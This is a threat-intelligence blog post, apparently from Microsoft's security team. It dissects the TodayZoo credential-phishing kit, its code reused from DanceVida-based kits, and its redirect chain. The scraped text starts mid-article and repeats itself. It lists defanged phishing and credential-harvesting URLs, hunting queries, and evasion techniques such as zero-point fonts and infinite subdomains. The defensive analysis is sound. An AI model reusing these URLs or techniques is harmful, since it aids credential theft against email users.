In almost every instance of the TodayZoo-based campaign we’ve seen, the final landing page is hosted within the service provider DigitalOcean. This page bears a few tangible differences from a standard Microsoft 365 sign-in page. Notably, it has not substantially changed in appearance from the start of the year to the time of publication of this blog. This lack of change is because, despite the numerous changes in the delivery method, lures, and sites used as indicators of attack (IOAs), the TodayZoo kit stayed nearly identical with only a few strings changing.

Screenshot of phishing page where credentials are stolen

Figure 3. An example of TodayZoo’s fake sign-in page in August 2021

There was little of the obfuscation component within the TodayZoo kit because the landing page’s source code revealed where the stolen credentials would be exfiltrated, which was another compromised site ending in TodayZoo.php. Typically, credential harvesting pages process the credentials and forward them to additional email accounts owned by sellers or purchasers of the kit for collection later. It’s unusual for campaigns to store the credentials locally on the site itself.

Screenshot of code for credential harvesting

Figure 4. An excerpt from the TodayZoo HTML source depicting credential exfiltration

It should be noted that based on our analysis, the file name TodayZoo.php appears to be derived from a previous version of the phishing kit whose credential processing page ends in Zoom.php. The said version also has markers like “Today Zoom Meetings,” indicating that it was initially targeting users of a popular video conferencing application.

The succeeding TodayZoo-based campaigns follow the attack killchain pattern and source code discussed above. While for the first few months of operation, TodayZoo.php was utilized, the most recent harvesting pages have maintained the word “today” but now may use vcoominctodayq.php instead.

The attackers have also moved from abusing a single legitimate mailing service to compromising mailing service accounts for their email campaigns. However, they maintain specific leftover character patterns in their URL paths and subdomains that work with the other TTPs described.

Piecing the puzzle

Typically, phishing kits that are resold or reused have indicators of multiple actors using them through their generated email campaigns. For example, these campaigns will have varying redirection techniques and hosting domains for their final landing pages. In the case of TodayZoo, as previously mentioned, there is consistency in the patterns, domains, and TTPs of the related campaigns. While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits. These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own.

Within the source code of the TodayZoo landing page we analyzed, there were several static references at the very start to external sources. Generally, these external links help a phishing kit properly imitate the login page and other branding elements of the site they are spoofing. However, in TodayZoo’s case, many of these site connections were “dead links” and did not serve a relevant function within the page. Littered throughout the source code as well were various markers like <!– FORM 1111111111111111 –> and <!– FINISHHHHHHHHHHHHHHHHHHHHH –>. Some portions of the source code also utilized multiple languages in different sections, making clear indications of which ones have been replaced.

Upon further investigation, we identified the dead links and markers as holdovers from many other commoditized kits available for free or purchase. We then compared TodayZoo with other phishing kits we have analyzed previously and found that even these kits also contained references to sites like Dancevida[.]com but would have different code blocks for their obfuscation or credential harvest components.

Screenshot of TodayZoo code showing references to DanceVida

Figure 5. An excerpt from a TodayZoo landing page source code referencing DanceVida[.]com

The DanceVida connection

“DanceVida” is more of a code block than a full-fledged phishing kit. As such, kits that use DanceVida are rather diverse in their delivery, lures, and location because they are directly for sale on various forums under kit-naming schemas, as well as under a wider variety of landing page templates, including document download pages. Most of the credentials that the DanceVida-based kits’ harvesting pages gather are exfiltrated to accounts using free email services, such as GMail, Yahoo!, and Yandex.

One of the more notable kits that also reference DanceVida and share components with what we observed in the TodayZoo credential phishing campaigns is “Office-RD117,” which is related to an online seller known as “Fud Tool.” This seller also offers other phishing kits and email and SMS delivery tools on various forums and other websites.

Screenshot of FUD Tool website

Figure 6: Screenshot of the now-defunct Fud Tool website from the Wayback Machine Internet Archive

It is interesting to note that when analyzing the Office-RD117 kit, we also saw signatures from multiple sellers within its packaged resources. There are also instances of dead links, such as a reference to a GitHub account that was only live for less than a day in January 2020 (the said account is still carried over to kits online as of this writing). This goes to show that even commercially available phishing kits reuse and repurpose elements from other ones. Such mixing and matching also make it quite challenging to determine where one kit ends and another one begins.

Comparing TodayZoo with DanceVida and other kits

In the case of TodayZoo, we observed that its implementations only match the larger superset of kits referencing DanceVida at about 30-35%. As seen in the figures below that compare a TodayZoo sample with a randomly selected DanceVida sample, both initially have similar structure and pieces of code until TodayZoo deviated in the credential harvesting component:

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 7. A comparison of DanceVida and TodayZoo kits, showing matching source codes

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 8. A comparison of DanceVida and TodayZoo kits showing highly similar source codes. Note how TodayZoo has changed its variables.

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 9. A comparison of DanceVida and TodayZoo kits showing slightly different implementation for credential posting

To further illustrate the “Frankenstein’s monster” characteristic of TodayZoo, the table below expands the comparison of one of its current phishing pages with Office-RD117, as well as with four other landing pages. These landing pages are unattributed to specific operators and reference DanceVida or use the same credential-harvesting POST statements. While all these samples share code segments in their imitation, obfuscation, or credential harvesting components, they each still have unique elements that differentiate them.

Table comparing different phishing kits and their similarity with TodayZoo

Table 1. Similarity areas and percentages of related phish kits to a recent TodayZoo sample

Visual representation of similarity of code between TodayZoo and other phishing kits

Figure 10. Graphical representation of the similarity areas of related phish kits to a recent TodayZoo sample

The above comparisons show a history of alterations and suggest an existence of a “core” set of codes being reused by these phishing kits. They are also reminiscent of how remote access Trojans (RAT) and other malware families are continuously retooled by threat actors yet retain large chunks of code blocks across the board.

How threat intelligence enriches anti-phishing technologies in Microsoft Defender for Office 365

Our analysis of TodayZoo, DanceVida, and other phishing kits gives us several insights into the underground economy today. First, this research further proves that most phishing kits observed or available today are based on a smaller cluster of larger kit “families.” While this trend has been observed previously, it continues to be the norm, given how phishing kits we’ve seen share large amounts of code among themselves. The continued presence of dead links and callbacks to other kits indicates that many phishing kit distributors and phishing operators have easy access to these existing kits and use parts of them to make new ones faster.

Secondly, our research shows that the players in the cybercrime economy count on a lack of examination into their products. Whether that is a bane or a boon on their part depends on how the products’ codes are implemented. For example, an unchecked reused kit that still calls back to its original creator with copies of stolen credentials potentially translates into an equivalent of a passive income for the said creator.

Insights such as those presented above enrich our protection technologies. Our intelligence on unique phishing kits such as TodayZoo, phishing services, and other components of phishing attacks allows Microsoft Defender for Office 365 to detect related campaigns and block malicious emails, URLs, and landing pages. Combined with Defender for Office 365’s use of machine learning, heuristics, and advanced detonation technology, such intel also makes it possible to detect kits that attempt to leverage techniques from one or multiple codes, even before a user receives the email or interacts with the content.

Threat intelligence about the latest trends in the phishing landscape also feeds into other Microsoft security solutions, such as Microsoft Defender SmartScreen, which blocks phishing websites and malicious URLs and domains in the browser, and Network protection, which blocks connections to malicious domains and IP addresses. Advanced hunting capabilities allow analysts to search for phishing kit components and other IOAs.

Organizations can configure the recommended settings in Microsoft Defender for Office 365, such as applying anti-phishing, Safe Links, and Safe Attachments policies. These ensure real-time protection by scanning at the time of delivery and at the time of click. They can further strengthen their protection with Microsoft 365 Defender, which correlates signals from emails, endpoints, and other domains, delivering coordinated defense.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

Visit our National Cybersecurity Awareness Month page for more resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

 

Microsoft 365 Defender Threat Intelligence Team

 

Advanced hunting queries

Emails with TodayZoo operator patterns

Use this query to find emails sent that utilize additional forward slashes at the path and domain split point and utilize the TodayZoo operators’ patterns in the path and the subdomain structure. TodayZoo operators occasionally store URLs in the attachment, so this query would not surface those instances.

EmailUrlInfo
| where Url matches regex "(ujsd)?\\.[a-z]+\\.com\\/\\/.+\\.#"

Endpoint activity where TodayZoo patterns redirect to DigitalOcean

Use this query to find emails sent that utilize additional forward slashes at the path and domain split point and utilize the TodayZoo operators’ patterns in the path and the subdomain structure.

DeviceNetworkEvents
| where RemoteUrl matches regex "(ujsd)\\.[a-z]+\\.com\\/\\/.+\\.#" or RemoteUrl endswith "digitaloceanspaces.com"
| extend Domain = extract(@"[^.]+(\.[^.]{2,3})?\.[^.]{2,12}$", 0, RemoteUrl)
| summarize dcount(Domain), make_set(Domain) by DeviceId,bin(Timestamp, 1h), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_Domain >= 2

Indicators of compromise

Sample initial base domains

pentsweser[.]com eurhutos[.]com dalotcii[.]com
buiyosi[.]com gsuouyty[.]com matanictii[.]com
phmakert[.]com brepeme[.]com conncorrd[.]com
sazmath[.]com normmavec[.]com jumperctin[.]com
selfessdas[.]com kurvuty[.]com iotryfuty[.]com
setmakersl[.]com vlogctii[.]com coffimkeer[.]com
mosyeurty[.]com qurythuy[.]com carlssbad[.]com
chovamb[.]com tenssmor[.]com tenssmr[.]com
coffkeer[.]com tamsops[.]com speedoms[.]com
shageneppi[.]com shadain[.]com coffieer[.]com
cofeer[.]com carrtwright[.]com uyfteuty[.]com
slobhurtiy[.]com braingones[.]com beinsmter[.]com
ksfcaghyou[.]com coffkr[.]com rtuatatcty[.]com
lamyot[.]com tenssm[.]com kanesatakss[.]com
brainsdeads[.]com ourygshry[.]com

Sample initial domains with subdomains

1776769042[.]ujsd[.]iotryfuty[.]com 443577567[.]ujsd[.]iotryfuty[.]com
646611056[.]ujsd[.]gsuouyty[.]com 1007183231[.]ujsd[.]gsuouyty[.]com
1469782555[.]ujsd[.]phmakert[.]com 1436029448[.]ujsd[.]buiyosi[.]com
946552600[.]ujsd[.]buiyosi[.]com 1733787821[.]ujsd[.]buiyosi[.]com
1988722677[.]ujsd[.]eurhutos[.]com 255622856[.]ujsd[.]eurhutos[.]com
600774497[.]ujsd[.]sazmath[.]com 1315116569[.]ujsd[.]setmakersl[.]com
1179340144[.]ujsd[.]sazmath[.]com 516942697[.]ujsd[.]setmakersl[.]com
1742965301[.]ujsd[.]setmakersl[.]com 124967719[.]ujsd[.]normmavec[.]com
202271174[.]ujsd[.]pentsweser[.]com 1010306526[.]ujsd[.]iotryfuty[.]com
728156920[.]ujsd[.]iotryfuty[.]com 1244535616[.]ujsd[.]selfessdas[.]com
1227334331[.]ujsd[.]selfessdas[.]com 1229648857[.]ujsd[.]kurvuty[.]com
926765708[.]ujsd[.]kurvuty[.]com 254503147[.]ujsd[.]kurvuty[.]com
1656812361[.]ujsd[.]dalotcii[.]com 100666740[.]ujsd[.]matanictii[.]com
404793834[.]ujsd[.]matanictii[.]com 879643450[.]ujsd[.]matanictii[.]com
658338120[.]ujsd[.]matanictii[.]com 1359496128[.]ujsd[.]dalotcii[.]com
995216045[.]ujsd[.]dalotcii[.]com 1838392685[.]ujsd[.]dalotcii[.]com
9725332[.]ujsd[.]brepeme[.]com 1668463162[.]ujsd[.]conncorrd[.]com
165175575[.]ujsd[.]sazmath[.]com 215852665[.]ujsd[.]brepeme[.]com

Sample initial URLs

  • odghyuter[.]com//wfvmlpxuhjeq[.]#aHR0cHM6Ly9wb2dmaHJ5ZXQuY29tL2VkZmgua2VyZnEvI25vLXJlcGx5QG1pY3Jvc29mdC5jb20=
  • ujsd.coffimkeer[.]com//0jw7yklk[.]#aHR0cHM6Ly9sdWh5cnR5ZS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.pentsweser[.]com//iojjyaqw[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.brepeme[.]com//bnxvhyex[.]#aHR0cHM6Ly92YWVwbGVyLmNvbS9lZGZoLmtlcmZxLyNuby1yZXBseUBtaWNyb3NvZnQuY29t

Sample secondary (redirector) URLs

  • pogfhryet[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com
  • luhyrtye[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com

Sample final landing page

  • nyc3[.]digitaloceanspaces[.]com/bnj/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25[.]html#no-reply@microsoft[.]com

Sample credential harvesting page

  • lcspecops[.]com/psl/vcoominctodayq[.]php

References

 

The post Franken-phish: TodayZoo built from other phishing kits appeared first on Microsoft Security Blog.

Franken-phish: TodayZoo built from other phishing kits

October 21st, 2021 No comments

A phishing kit built using pieces of code copied from other kits, some available for sale through publicly accessible scam sellers or are reused and repackaged by other kit resellers, provides rich insight into the state of the economy that drives phishing and email threats today. We uncovered this phishing kit while examining an extensive series of credential phishing campaigns that all sent credentials to a set of endpoints operated by the attackers.

We named the kit “TodayZoo” because of its curious use of these words in its credential harvesting component in earlier campaigns, likely a reference to phishing pages that spoofed a popular video conferencing application. Our prior research on phishing kits told us TodayZoo contained large pieces of code copied from widely circulated ones. The copied code segments even have the comment markers, dead links, and other holdovers from the previous kits.

Today’s phishing attacks operate on a landscape fueled by an evolved service-based economy filled with efficient, reliable, and profitable offerings. Attackers who wish to launch a phishing campaign may rent their resource and infrastructure needs from phishing-as-a-service (PhaaS) providers, who do the legwork for them. Alternatively, they can make a one-time purchase of a phishing kit that they can “plug and play.”

That’s not to say that attackers who build their kits from the ground up are at a disadvantage. If anything, the abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits. They put these functionalities together in a customized kit and try to reap the benefits all to themselves. Such is the case of TodayZoo: because of the consistency in the redirection patterns, domains, and other techniques, tactics, and procedures (TTPs) of its related campaigns, we believe that the actors behind it came across an old phishing kit template and replaced the credential harvesting part with its own exfiltration logic to make TodayZoo solely for their nefarious purposes.

Since the first observed instances of the TodayZoo phishing kit last December, large email campaigns leading to it have continued without significant pause. Our analysis of its phishing page artifacts, redirection routines, and domain generation algorithm (DGA) methods for the initial sites helps ensure Microsoft Defender for Office 365 effectively protect customers from the said campaigns.

Microsoft tracks unique phishing kits, phishing services, and other components used in phishing to better protect customers from malicious emails at a larger scale. Combined with our monitoring of individual credential campaigns and the latest evasion techniques, our research into kits and services provides us with a better understanding of the structure of phishing email messages. Such threat intelligence and insights, in turn, feed into our protection technologies, such as Defender for Office 365 and Microsoft 365 Defender.

This blog post details some of the technical aspects of a phishing campaign based on the TodayZoo kit. It also provides information about “DanceVida,” a potential parent family of kits based on a shared resource link, and how it and other historical patterns figure in TodayZoo’s code structure.

What’s in a kit?

A “phishing kit” or “phish kit” can refer to various parts of a set of software or services meant to facilitate phishing. The term refers most commonly to an archive file containing images, scripts, and HTML pages that enable an attacker to quickly set up an undetectable phishing page and collect credentials through it. However, “phishing kit” can also be used to refer specifically to the unique page itself that spoofs a brand and interacts with a user, collects the user’s credentials, and posts them to an asset the attacker owns.

Phishing kits are generally split into the following major components based on function:

  • Imitation: These components help make the login pages appear legitimate. These can include imagery to imitate welcome banners, as well as dynamically generated logos and branding that are fetched based on the target’s email address. These components may also include legitimate links and “help” or “password reset” buttons that navigate cautious users out of the page and onto legitimate sites.
  • Obfuscation: These components hide the pages’ true purpose from scanners or automated security detection systems. Obfuscation techniques can be through encoding or individual functions designed to make the extraction of resources more difficult. Obfuscation can also include anti-sandboxing resources on the page or on the site that are called to enforce geofencing, CAPTCHAs, and others.
  • Credential harvest: These components facilitate the entry, collection, and exfiltration of the credentials the target user provides. These components also include information about where said credentials are sent, how they are stored, and which sites the user is sent to after giving their credentials.

These components are seen in the TodayZoo phishing kit, which we will discuss in the following sections.

Breaking down a TodayZoo-based phishing campaign

The use of the TodayZoo phishing kit was initially seen in December 2020. Then, in March 2021, we observed a series of phishing campaigns abuse the AwsApps[.]com domain to send the email messages that eventually directed users to the final landing pages, leading us to examine the kit more closely. As of this writing, we have already notified Amazon about the abovementioned abuse in their domain, and they promptly took action.

The attackers created malicious accounts at scale. Initially, the sender emails appeared with randomly generated domain names such as wederfs76y3uwedi3uy89ewdu23ye87293eqwhduayqw[.]awsapps[.]com. This contrasts legitimate emails—and even some spoofed phishing ones—where the subdomain would represent a company hostname.

The email message itself was relatively simple: it impersonated Microsoft and leveraged a zero-point font obfuscation technique in an attempt to evade detection. For example, in the early iterations of their campaign, the attackers used the <ins></ins> tags to insert the date of the message every few characters invisibly, as shown below:

Screenshot of HTML code showing zero-point font technique

Figure 1. Example of zero-point font obfuscation to insert the date into the HTML code of the email message

The social engineering lures in the message body repeatedly changed over the months. Campaigns in April and May used password reset, while more the recent campaigns in August were leveraging fax and scanner notifications.

Screenshot of email used in this campaign

Figure 2. Example of an email lure leading to TodayZoo phishing kit

Regardless of the lure, the following attack chain is consistent, with initial and secondary redirectors, a final landing page, and a credential harvesting page. Below is a sample of TodayZoo’s attack chain URLs:

  • Initial redirector: hxxp://2124658742[.]ujsd[.]pentsweser[.]com//fhwpp8sv[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • Secondary redirector: hxxps://limestonesm[.]com/edfh.kerfq/#no-reply@microsoft[.]com
  • Final landing page: hxxps://fra1[.]digitaloceanspaces[.]com/koip/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26.html#no-reply@microsoft[.]com
  • Credential harvesting page: hxxps://nftduniya[.]com/cas/vcoominctodayq[.]php

The initial and secondary URLs are either compromised or attacker-created sites and serve as redirectors to funnel the more extensive set of URLs used in the emails to the final landing page where the phishing kit is hosted. The initial URL used infinite subdomains, a previously discussed technique that allows attackers to use a unique URL for each recipient while only purchasing or compromising one domain. The URL also leveraged malformed URLs that consisted of multiple forward slashes at the demarcation of the path, as well as the secondary URL that is encoded along with the recipient’s email address.

In almost every instance of the TodayZoo-based campaign we’ve seen, the final landing page is hosted within the service provider DigitalOcean. This page bears a few tangible differences from a standard Microsoft 365 sign-in page. Notably, it has not substantially changed in appearance from the start of the year to the time of publication of this blog. This lack of change is because, despite the numerous changes in the delivery method, lures, and sites used as indicators of attack (IOAs), the TodayZoo kit stayed nearly identical with only a few strings changing.

Screenshot of phishing page where credentials are stolen

Figure 3. An example of TodayZoo’s fake sign-in page in August 2021

There was little of the obfuscation component within the TodayZoo kit because the landing page’s source code revealed where the stolen credentials would be exfiltrated, which was another compromised site ending in TodayZoo.php. Typically, credential harvesting pages process the credentials and forward them to additional email accounts owned by sellers or purchasers of the kit for collection later. It’s unusual for campaigns to store the credentials locally on the site itself.

Screenshot of code for credential harvesting

Figure 4. An excerpt from the TodayZoo HTML source depicting credential exfiltration

It should be noted that based on our analysis, the file name TodayZoo.php appears to be derived from a previous version of the phishing kit whose credential processing page ends in Zoom.php. The said version also has markers like “Today Zoom Meetings,” indicating that it was initially targeting users of a popular video conferencing application.

The succeeding TodayZoo-based campaigns follow the attack killchain pattern and source code discussed above. While for the first few months of operation, TodayZoo.php was utilized, the most recent harvesting pages have maintained the word “today” but now may use vcoominctodayq.php instead.

The attackers have also moved from abusing a single legitimate mailing service to compromising mailing service accounts for their email campaigns. However, they maintain specific leftover character patterns in their URL paths and subdomains that work with the other TTPs described.

Piecing the puzzle

Typically, phishing kits that are resold or reused have indicators of multiple actors using them through their generated email campaigns. For example, these campaigns will have varying redirection techniques and hosting domains for their final landing pages. In the case of TodayZoo, as previously mentioned, there is consistency in the patterns, domains, and TTPs of the related campaigns. While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits. These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own.

Within the source code of the TodayZoo landing page we analyzed, there were several static references at the very start to external sources. Generally, these external links help a phishing kit properly imitate the login page and other branding elements of the site they are spoofing. However, in TodayZoo’s case, many of these site connections were “dead links” and did not serve a relevant function within the page. Littered throughout the source code as well were various markers like <!– FORM 1111111111111111 –> and <!– FINISHHHHHHHHHHHHHHHHHHHHH –>. Some portions of the source code also utilized multiple languages in different sections, making clear indications of which ones have been replaced.

Upon further investigation, we identified the dead links and markers as holdovers from many other commoditized kits available for free or purchase. We then compared TodayZoo with other phishing kits we have analyzed previously and found that even these kits also contained references to sites like Dancevida[.]com but would have different code blocks for their obfuscation or credential harvest components.

Screenshot of TodayZoo code showing references to DanceVida

Figure 5. An excerpt from a TodayZoo landing page source code referencing DanceVida[.]com

The DanceVida connection

“DanceVida” is more of a code block than a full-fledged phishing kit. As such, kits that use DanceVida are rather diverse in their delivery, lures, and location because they are directly for sale on various forums under kit-naming schemas, as well as under a wider variety of landing page templates, including document download pages. Most of the credentials that the DanceVida-based kits’ harvesting pages gather are exfiltrated to accounts using free email services, such as GMail, Yahoo!, and Yandex.

One of the more notable kits that also reference DanceVida and share components with what we observed in the TodayZoo credential phishing campaigns is “Office-RD117,” which is related to an online seller known as “Fud Tool.” This seller also offers other phishing kits and email and SMS delivery tools on various forums and other websites.

Screenshot of FUD Tool website

Figure 6: Screenshot of the now-defunct Fud Tool website from the Wayback Machine Internet Archive

It is interesting to note that when analyzing the Office-RD117 kit, we also saw signatures from multiple sellers within its packaged resources. There are also instances of dead links, such as a reference to a GitHub account that was only live for less than a day in January 2020 (the said account is still carried over to kits online as of this writing). This goes to show that even commercially available phishing kits reuse and repurpose elements from other ones. Such mixing and matching also make it quite challenging to determine where one kit ends and another one begins.

Comparing TodayZoo with DanceVida and other kits

In the case of TodayZoo, we observed that its implementations only match the larger superset of kits referencing DanceVida at about 30-35%. As seen in the figures below that compare a TodayZoo sample with a randomly selected DanceVida sample, both initially have similar structure and pieces of code until TodayZoo deviated in the credential harvesting component:

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 7. A comparison of DanceVida and TodayZoo kits, showing matching source codes

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 8. A comparison of DanceVida and TodayZoo kits showing highly similar source codes. Note how TodayZoo has changed its variables.

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 9. A comparison of DanceVida and TodayZoo kits showing slightly different implementation for credential posting

To further illustrate the “Frankenstein’s monster” characteristic of TodayZoo, the table below expands the comparison of one of its current phishing pages with Office-RD117, as well as with four other landing pages. These landing pages are unattributed to specific operators and reference DanceVida or use the same credential-harvesting POST statements. While all these samples share code segments in their imitation, obfuscation, or credential harvesting components, they each still have unique elements that differentiate them.

Table comparing different phishing kits and their similarity with TodayZoo

Table 1. Similarity areas and percentages of related phish kits to a recent TodayZoo sample

Visual representation of similarity of code between TodayZoo and other phishing kits

Figure 10. Graphical representation of the similarity areas of related phish kits to a recent TodayZoo sample

The above comparisons show a history of alterations and suggest an existence of a “core” set of codes being reused by these phishing kits. They are also reminiscent of how remote access Trojans (RAT) and other malware families are continuously retooled by threat actors yet retain large chunks of code blocks across the board.

How threat intelligence enriches anti-phishing technologies in Microsoft Defender for Office 365

Our analysis of TodayZoo, DanceVida, and other phishing kits gives us several insights into the underground economy today. First, this research further proves that most phishing kits observed or available today are based on a smaller cluster of larger kit “families.” While this trend has been observed previously, it continues to be the norm, given how phishing kits we’ve seen share large amounts of code among themselves. The continued presence of dead links and callbacks to other kits indicates that many phishing kit distributors and phishing operators have easy access to these existing kits and use parts of them to make new ones faster.

Secondly, our research shows that the players in the cybercrime economy count on a lack of examination into their products. Whether that is a bane or a boon on their part depends on how the products’ codes are implemented. For example, an unchecked reused kit that still calls back to its original creator with copies of stolen credentials potentially translates into an equivalent of a passive income for the said creator.

Insights such as those presented above enrich our protection technologies. Our intelligence on unique phishing kits such as TodayZoo, phishing services, and other components of phishing attacks allows Microsoft Defender for Office 365 to detect related campaigns and block malicious emails, URLs, and landing pages. Combined with Defender for Office 365’s use of machine learning, heuristics, and advanced detonation technology, such intel also makes it possible to detect kits that attempt to leverage techniques from one or multiple codes, even before a user receives the email or interacts with the content.

Threat intelligence about the latest trends in the phishing landscape also feeds into other Microsoft security solutions, such as Microsoft Defender SmartScreen, which blocks phishing websites and malicious URLs and domains in the browser, and Network protection, which blocks connections to malicious domains and IP addresses. Advanced hunting capabilities allow analysts to search for phishing kit components and other IOAs.

Organizations can configure the recommended settings in Microsoft Defender for Office 365, such as applying anti-phishing, Safe Links, and Safe Attachments policies. These ensure real-time protection by scanning at the time of delivery and at the time of click. They can further strengthen their protection with Microsoft 365 Defender, which correlates signals from emails, endpoints, and other domains, delivering coordinated defense.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

Visit our National Cybersecurity Awareness Month page for more resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

 

Microsoft 365 Defender Threat Intelligence Team

 

Advanced hunting queries

Emails with TodayZoo operator patterns

Use this query to find emails sent that utilize additional forward slashes at the path and domain split point and utilize the TodayZoo operators’ patterns in the path and the subdomain structure. TodayZoo operators occasionally store URLs in the attachment, so this query would not surface those instances.

EmailUrlInfo
| where Url matches regex "(ujsd)?\\.[a-z]+\\.com\\/\\/.+\\.#"

Endpoint activity where TodayZoo patterns redirect to DigitalOcean

Use this query to find emails sent that utilize additional forward slashes at the path and domain split point and utilize the TodayZoo operators’ patterns in the path and the subdomain structure.

DeviceNetworkEvents
| where RemoteUrl matches regex "(ujsd)\\.[a-z]+\\.com\\/\\/.+\\.#" or RemoteUrl endswith "digitaloceanspaces.com"
| extend Domain = extract(@"[^.]+(\.[^.]{2,3})?\.[^.]{2,12}$", 0, RemoteUrl)
| summarize dcount(Domain), make_set(Domain) by DeviceId,bin(Timestamp, 1h), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_Domain >= 2

Indicators of compromise

Sample initial base domains

pentsweser[.]com eurhutos[.]com dalotcii[.]com
buiyosi[.]com gsuouyty[.]com matanictii[.]com
phmakert[.]com brepeme[.]com conncorrd[.]com
sazmath[.]com normmavec[.]com jumperctin[.]com
selfessdas[.]com kurvuty[.]com iotryfuty[.]com
setmakersl[.]com vlogctii[.]com coffimkeer[.]com
mosyeurty[.]com qurythuy[.]com carlssbad[.]com
chovamb[.]com tenssmor[.]com tenssmr[.]com
coffkeer[.]com tamsops[.]com speedoms[.]com
shageneppi[.]com shadain[.]com coffieer[.]com
cofeer[.]com carrtwright[.]com uyfteuty[.]com
slobhurtiy[.]com braingones[.]com beinsmter[.]com
ksfcaghyou[.]com coffkr[.]com rtuatatcty[.]com
lamyot[.]com tenssm[.]com kanesatakss[.]com
brainsdeads[.]com ourygshry[.]com

Sample initial domains with subdomains

1776769042[.]ujsd[.]iotryfuty[.]com 443577567[.]ujsd[.]iotryfuty[.]com
646611056[.]ujsd[.]gsuouyty[.]com 1007183231[.]ujsd[.]gsuouyty[.]com
1469782555[.]ujsd[.]phmakert[.]com 1436029448[.]ujsd[.]buiyosi[.]com
946552600[.]ujsd[.]buiyosi[.]com 1733787821[.]ujsd[.]buiyosi[.]com
1988722677[.]ujsd[.]eurhutos[.]com 255622856[.]ujsd[.]eurhutos[.]com
600774497[.]ujsd[.]sazmath[.]com 1315116569[.]ujsd[.]setmakersl[.]com
1179340144[.]ujsd[.]sazmath[.]com 516942697[.]ujsd[.]setmakersl[.]com
1742965301[.]ujsd[.]setmakersl[.]com 124967719[.]ujsd[.]normmavec[.]com
202271174[.]ujsd[.]pentsweser[.]com 1010306526[.]ujsd[.]iotryfuty[.]com
728156920[.]ujsd[.]iotryfuty[.]com 1244535616[.]ujsd[.]selfessdas[.]com
1227334331[.]ujsd[.]selfessdas[.]com 1229648857[.]ujsd[.]kurvuty[.]com
926765708[.]ujsd[.]kurvuty[.]com 254503147[.]ujsd[.]kurvuty[.]com
1656812361[.]ujsd[.]dalotcii[.]com 100666740[.]ujsd[.]matanictii[.]com
404793834[.]ujsd[.]matanictii[.]com 879643450[.]ujsd[.]matanictii[.]com
658338120[.]ujsd[.]matanictii[.]com 1359496128[.]ujsd[.]dalotcii[.]com
995216045[.]ujsd[.]dalotcii[.]com 1838392685[.]ujsd[.]dalotcii[.]com
9725332[.]ujsd[.]brepeme[.]com 1668463162[.]ujsd[.]conncorrd[.]com
165175575[.]ujsd[.]sazmath[.]com 215852665[.]ujsd[.]brepeme[.]com

Sample initial URLs

  • odghyuter[.]com//wfvmlpxuhjeq[.]#aHR0cHM6Ly9wb2dmaHJ5ZXQuY29tL2VkZmgua2VyZnEvI25vLXJlcGx5QG1pY3Jvc29mdC5jb20=
  • ujsd.coffimkeer[.]com//0jw7yklk[.]#aHR0cHM6Ly9sdWh5cnR5ZS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.pentsweser[.]com//iojjyaqw[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.brepeme[.]com//bnxvhyex[.]#aHR0cHM6Ly92YWVwbGVyLmNvbS9lZGZoLmtlcmZxLyNuby1yZXBseUBtaWNyb3NvZnQuY29t

Sample secondary (redirector) URLs

  • pogfhryet[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com
  • luhyrtye[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com

Sample final landing page

  • nyc3[.]digitaloceanspaces[.]com/bnj/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25[.]html#no-reply@microsoft[.]com

Sample credential harvesting page

  • lcspecops[.]com/psl/vcoominctodayq[.]php

References

 

The post Franken-phish: TodayZoo built from other phishing kits appeared first on Microsoft Security Blog.

Catching the big fish: Analyzing a large-scale phishing-as-a-service operation

September 21st, 2021 No comments

